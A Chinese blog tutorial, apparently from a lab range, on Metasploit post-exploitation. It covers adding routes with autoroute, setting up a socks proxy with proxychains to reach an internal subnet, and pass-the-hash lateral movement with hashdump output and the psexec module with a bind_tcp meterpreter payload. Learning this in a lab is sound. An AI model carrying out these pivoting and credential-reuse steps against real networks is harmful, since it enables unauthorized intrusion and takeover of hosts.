MSF后渗透之进阶知识

文中主要讲解kali中metasploit的用法,通常我们简称MSF,通过学习了解MSF的各种命令小技巧,从而掌握后渗透技术。本次实验环境靶场来自于暗月(moonsec)师傅,文中内容全由个人理解编制,若有错处,大佬勿喷,个人学艺不精;本文中提到的任何技术都源自于靶场练习,仅供学习参考,请勿利用文章内的相关技术从事非法测试,如因产生的一切不良后果与文章作者无关。

MSF后渗透之进阶知识

获取信息

当我们获取了一个shell后,通常会遇到跨路由访问,这个时候我们就需要使用MSF来建立路由以及socks连接搭建隧道以便于我们的通信:
从这里看出是有两张网卡的:
MSF后渗透之进阶知识
虽然在我们的MSF中是可以对这个内网10段进行访问的,但我们在外面是并不能进行访问的:
MSF后渗透之进阶知识
MSF后渗透之进阶知识

建立路由

所以为了让外面也能同样进行访问,便于我们的渗透测试,所以需要建立路由,然后建立socks通道利用工具来进行代理访问:

run get_local_subnets #获取网卡信息
run autoroute -s 10.10.10.0/24 #添加路由10段
run autoroute -p #查看路由情况

MSF后渗透之进阶知识

隧道建立

建立socks5隧道:

search socks #查看socks 模块
use auxiliary/server/socks_proxy #切换到这个模块

这里的信息,VERSION SRVHOST不需要修改,SRVPORT如果修改,那么在隧道文件中也需要随之进行修改,可使用默认1080端口
MSF后渗透之进阶知识
修改隧道文件:

vim /etc/proxychains4.conf

MSF后渗透之进阶知识
使用proxychains4工具来代理:

proxychains4 nmap 10.10.10.138 -sT -Pn -A -p 445

MSF后渗透之进阶知识

内网横向

这样我们就可以从外面访问到10.10.10.138
当我们在跳板机上通过hashdump查到了hash,我们就可以利用psexec这个模块来进行攻击,来探测密码是否一致,如果一致,那么我们就可以扩大了内网控制权,实现内网横向:
首先获取hash:

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b:::

MSF后渗透之进阶知识
然后使用模块进行攻击:
这里必须使用正向连接:

use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp #正向连接
set RHOST 10.10.10.138 #被攻击机地址
set SMBUser administrator
set SMBPass aad3b435b51404eeaad3b435b51404ee:627782b7274e323941c9418399460d5b 
show options #查看信息

MSF后渗透之进阶知识
虽然我们已经建立了路由,但并没有在msf中设置全局代理,所以是无法攻击成功的。

setg Proxies socks5:192.168.1.6:1080 #设置全局代理
set ReverseAllowProxy true #这个参数是因为使用全局代理,可能会导致我们的shell无法反弹,所以需要开启。

成功反弹:
MSF后渗透之进阶知识

当如果有多网段,那么我们也同样可以通过添加路由的方式,来进行访问。

上一篇:利用mnist数据集进行深度神经网络


下一篇:什么是代理IP?作用是什么?